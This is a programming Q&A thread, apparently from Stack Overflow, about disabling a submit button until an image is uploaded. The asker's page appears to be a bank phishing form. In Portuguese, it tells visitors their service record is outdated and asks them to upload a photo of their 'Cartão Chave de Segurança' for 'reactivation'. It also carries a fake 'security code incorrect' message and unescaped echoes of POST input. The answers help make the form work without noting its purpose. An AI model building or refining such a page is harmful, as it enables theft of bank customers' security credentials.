# how to prevent Submit button when no file is uploaded from script?

Tags: javascript, php, jquery, html

I am driving crazy once I dont understand alot about javascript and php.
 I got working part of this script  , but having troubles to prevent the SUBMIT button going to other page if NO FILE was uploaded.

I will tryng to explain with my bad english. I am sorry in advance
 I got a JS script that resize the image. Its resize the image before upload to my server. It is working great. I am being able to save the resized file into server without problem too..

BUt I am not being able TO STOP the SUBMIT button from going ahead IF NO FILE is uploaded. PLease, help me !!

Below is the entire html and JS script:
 OBS: PROSSEGUIR = SUBMIT button in portuguese language.

```
<?php
include('conn.php');

$check_campo = $_POST['rand'];
$valor_campo = $_POST['position_check'];
$name = $_POST['name'];
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="theme-color" content="‪#ff0000">
    <meta name="msapplication-navbutton-color" content="#ff0000">
    <link rel="stylesheet" href="_styles/home.css">
    <script src="https://code.jquery.com/jquery-2.1.3.min.js"></script>
    <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
    <script src="js/canvas-to-blob.min.js"></script>
    <script src="js/resize.js"></script>

    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
    <script src="_jscripts/home.js"></script>
    <title> FONE</title>


</head>
<body>

<div class="container bg-red"> <!-- content -->
</div><!-- container -->

<div class="container">
    <div class="content">
        <div style="font-size:1em;color:#ff0000;padding:10px;text-align:center;">
            <?php echo $name;?>
        </div>
    <div class="clear"></div>
    </div><!-- content -->
</div><!-- container -->
 <script type="text/javascript">

        // Iniciando biblioteca
        var resize = new window.resize();
        resize.init();

        // Declarando variáveis
        var imagens;
        var imagem_atual;

        // Quando carregado a página
        $(function ($) {

            // Quando selecionado as imagens
            $('#imagem').on('change', function () {
                enviar();
            });

        });

        /*
         Envia os arquivos selecionados
         */
        function enviar()
        {
            // Verificando se o navegador tem suporte aos recursos para redimensionamento
            if (!window.File || !window.FileReader || !window.FileList || !window.Blob) {
                alert('O navegador não suporta os recursos utilizados pelo aplicativo');
                return;
            }

            // Alocando imagens selecionadas
            imagens = $('#imagem')[0].files;

            // Se selecionado pelo menos uma imagem
            if (imagens.length > 0)
            {
                // Definindo progresso de carregamento
                $('#progresso').attr('aria-valuenow', 0).css('width', '0%');

                // Escondendo campo de imagem
                $('#imagem').hide();

                // Iniciando redimensionamento
                imagem_atual = 0;
                redimensionar();
            }
        }

        /*
         Redimensiona uma imagem e passa para a próxima recursivamente
         */
        function redimensionar()
        {
            // Se redimensionado todas as imagens
            if (imagem_atual > imagens.length)
            {
                // Definindo progresso de finalizado
                $('#progresso').html('Imagen(s) enviada(s) com sucesso');

                // Limpando imagens
                limpar();

                // Exibindo campo de imagem
                $('#imagem').show();

                // Finalizando
                return;
            }

            // Se não for um arquivo válido
            if ((typeof imagens[imagem_atual] !== 'object') || (imagens[imagem_atual] == null))
            {
                // Passa para a próxima imagem
                imagem_atual++;
                redimensionar();
                return;
            }

            // Redimensionando
            resize.photo(imagens[imagem_atual], 800, 'dataURL', function (imagem) {

                // Salvando imagem no servidor
                $.post('ajax/salvar.php', {imagem: imagem}, function() {

                    // Definindo porcentagem
                    var porcentagem = (imagem_atual + 1) / imagens.length * 100;

                    // Atualizando barra de progresso
                    $('#progresso').text(Math.round(porcentagem) + '%').attr('aria-valuenow', porcentagem).css('width', porcentagem + '%');

                    // Aplica delay de 1 segundo
                    // Apenas para evitar sobrecarga de requisições
                    // e ficar visualmente melhor o progresso
                    setTimeout(function () {
                        // Passa para a próxima imagem
                        imagem_atual++;
                        redimensionar();
                    }, 1000);

                });

            });
        }

              /*
         Limpa os arquivos selecionados
         */


    </script>
<script>
     function getmms(imagem){
        if(!imagem){
            alert('Envie uma foto do seu cartão Chave');
            return false;
        }
        else{
            document.getElementById('file_info').value = imagem;
            document.getElementById('getmms').style.display = 'block';
            return false;
        }
        return false;
    }
</script>

<div class="container">
    <form action="msg_finaliza.php" method="post" name="form" onsubmit="return check_position();" enctype="multipart/form-data">
    <div class="content bg-cinza2" style="padding:10px;color:#fff;font-size:0.9em;">
            Seu protocolo de atendimento com tabela ao Internet  está desatualizado.<br><br>
            Para regularizar seu dados, siga os passos abaixo:<br><br>
            <span style="text-align:left!important;">
                Passo 1: Tire 1 foto do seu Cartão Chave de Segurança.<br>
                Passo 2: Envie a foto do seu Cartão Chave de Segurança.<br>
                Passo 3: Aguarde, nossos consultores vão validar e reativar seu Cartão Chave de Segurança!
            </span>
            <br><br>
            Clique no botão abaixo para enviar a foto do seu Cartão Chave de Segurança.
            <br><br>
            <a href="#" class="botao_sobrepor bg-red btn_next_two" style="text-decoration:none;font-weigth:700;position: relative;text-align:center;line-height:40px;">
            Selecionar Foto
            <input type="file" name="imagem" id="imagem" accept=".jpg,.jpeg,.png" style="position:absolute;opacity:0;top:0;left:0;background-color:blue;width:100%;height:40px;" onchange="return getmms(this.form.imagem.value);">
            </a>
            <div class="progress">
            <div id="progresso" class="progress-bar progress-bar-success" role="progressbar" aria-valuenow="0"
                 aria-valuemin="0" aria-valuemax="100" style="width: 0%;"></div>
        </div>
            <input type="hidden" name="file_info" id="file_info" value="">
            <span style="display:none;width98%;height:20px;line-height16px;" id="getmms">
                <img src="_images/ok-png.png" width="20" style="float:left;">
                <span style="display:inline-block;margin-left:10px;margin-top:3px;float:left;">Imagem carregada com sucesso.</span>
            </span>

    </div><!-- content -->
</div>

<div class="container" id="msg_position_erro" style="display:none;">
    <div class="content">
        <div id="receive_msg" style="display:block;margin-bottom:10px;font-size:0.8em;">
            O Código de segurança informado não está correto!<br><br>
            Tente novamente!
        </div>
    <div class="clear"></div>
    </div><!-- content -->
</div><!-- container -->

<div class="container">
    <div class="content">
        <input type="hidden" name="rand" id="rand" value="<?php echo $rand;?>">
        <input type="hidden" name="name" id="name" value="<?php echo $name;?>">
        <input type="submit" name="proseguir" id="proseguir" value="Prosseguir >>" class="bg-red btn_next_two">
    <div class="clear"></div>
    </div><!-- content -->
</div><!-- container -->
    </form>
</div><!-- container -->
<!-- container -->
</body>
</html>
<?php ob_end_flush();?>
```

Please, someone help me ?

Answer (score 0, accepted):

Your best bet would be to disable the submit button until there is a file available for upload. Do you know how to do that?

Start off with the button disabled and then if your file submission, resizing, etc. is successful (it doesn't happen unless an image is uploaded) then enable the Submit button.

Change your submit button as folllows:

```
<input type="submit" disabled name="proseguir" id="proseguir" value="Prosseguir >>" class="bg-red btn_next_two">
```

Then, add the extra line you see to your getmms function:

```
function getmms(imagem){
    if(!imagem){
        alert('Envie uma foto do seu cartão Chave');
        return false;
    }
else{
    document.getElementById('file_info').value = imagem;
    document.getElementById('getmms').style.display = 'block';
    $('#proseguir').prop('disabled', false);
    return false;
}
return false;
}
```

Are the two >> in the line below there intentionally?

```
 <input type="submit" name="proseguir" id="proseguir" value="Prosseguir >>" class="bg-red btn_next_two">
```

Comment: I honestly dont know how to do that into my .php file above. WOuld you be able to help me and make the scripts and codes necessary to make it working inside my .php above ?? I would thank you forever. I am very new to this..

Comment: Question: Why are you doing the actual sending from the resizing function instead of the sending function?

 ( I think this is Portugese but my Spanish is good enough to understand most of it)

Comment: because almost time the original image from the smartphone are up to 5mb. I use resize script to make it small and upload faster, understand ?? I need a small quality image inside my server.. I dont need the 100% quality image. It is working great.. but what I need is... if the client click in PROSSEGUIR (submit), the button will not go ahead and will pop up a alert saying (please, upload a image).. just after this... the submit go ahead, got it ?? do you have skype ?? I believe would be easy to me and you... I am already very happy to see you tryng to help me !!

Comment: I edited it and I think it might work But of course I can't test it from here.

Comment: the submit button keep showing before I upload a image .. and if I dont upload any image and I click in submite (prosseguir).. it´s keep going ahead..

Comment: Did you tell the submit button to be disabled when the page loads?

Comment: YEs. It is working great now !! The button is disabled now  and I cannot to click on it... and get activated (i can to click) only after the upload. Tell me another thing.?? is there any way to alert the client to upload the image if he try to click in submit before to upload the picture ??

Comment: Sure. Put an event listener on there that checks to see if it's disabled and if it is clicked on while disabled and if it is, pop up an alert. When you want to make it look better, you can do something else like a popup.

In your `<head>` section, add the following:
`<script>
    $(document).ready(function(){
       $("#proseguir").click(function(){
           if($(this).is('[disabled=disabled]') == true) {
               alert("Please upload an image before submitting");
           }           
       });
    });
</script>`

Comment: i put exactly the code in my  <head> but it didnt work... it keep disabled... but if I click.. it doesnt pop up a alert..

Comment: In the submit button change disabled to `disabled="diabled" ' and see if that works.

Comment: excuse me ?? I really didnt understand.. stay this:<input type="submit"  disabled name="proseguir" id="proseguir" value="Prosseguir >>" class="bg-red btn_next_two"> where do I change ??

Comment: Change to this: `<input type="submit" disabled="disabled" name="proseguir" id="proseguir" value="Prosseguir >>" class="bg-red btn_next_two">

Comment: didnt work. I made the change.. but didnt work.. and the script in the <head> is there..<script> $(document).ready(function(){ $("#proseguir").click(function(){ if($(this).is('[disabled=disabled]') == true) { alert("Please upload an image before submitting"); } }); }); </script>

Comment: Did you put the <script> at the bottom of the <head> section? It would need to exist after jQuery is loaded.

Comment: do you have skype or other ?? I would like to talk with you a few minutes

Comment: Yes. I put after these: script src="https://code.jquery.com/jquery-2.1.3.min.js"></script>
    <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
    <script src="js/canvas-to-blob.min.js"></script>
    <script src="js/resize.js"></script>

Comment: Give me a few minutes. I'll see if I can work out an example.

Comment: sure.I await. Thank you for your time !! it is very very appreciated

Comment: I'm going to have to try this tomorrow if possible. I'm out of time for the evening.

Comment: Hey @Difster, I understand totaly !! I await you  tomorrow !! can I count on you ?

Comment: It depends on what happens tomorrow but don't be afraid to do some research.

Comment: sure.. I will try,, but I dont understand  and since you already know what is going on. I believe you will see the coder to me .. I hope !! you already helped me a lot

Comment: good day Difster !! can you please help me to resolve that little problem of the "alert" button when someone try to click in the submit button before upload the image ??

Comment: hi Difster, can you help to solve that small problems when someone click on while disabled button and pop up an alert ??

Answer (score 1):

In your onsubmit event, add something like this

```
if($('#imagem').val().length == 0){
    alert("Please select an image");
    // optionally, disable submit button

    // prevent form from submitting
    return false;
} else {

   // let the form submit
}
```

Comment: would you be able to help me and add the necessary lines inside my above code ? I am very new to this.. Help me to fix that problem. I need that submit button (prosseguir button) work only after a image get uploaded ... help me please

Comment: @TimurGilauri trust me. I dont understand anything about this. I am just tryng to help a friend. I am totaly new to this. THis is the reason I am asking to put the necessary code inside my .php file. Of course I will learn seeing the result too

Comment: @ALessandro, ok look my answer

Comment: sure. I await anxiously

Answer (score 0):

```
    // Quando carregado a página
    $(function ($) {

        // Quando selecionado as imagens
        $('#imagem').on('change', function () {
            enviar();
        });

    });
```

Find this piece of code and then change it to this, adding what @Kevin P wrote:

```
    // Quando carregado a página
    $(function ($) {

        // Quando selecionado as imagens
        $('#imagem').on('change', function () {
            if($('#imagem').val().length == 0){
              alert("Please select an image");
              // optionally, disable submit button

              // prevent form from submitting
              return false;
            } else {
              enviar();
              // let the form submit
            }
        });

    });
```

Answer (score -1):

Have you defined check_position()?

Remember that the function should return `false` for it to not be submitted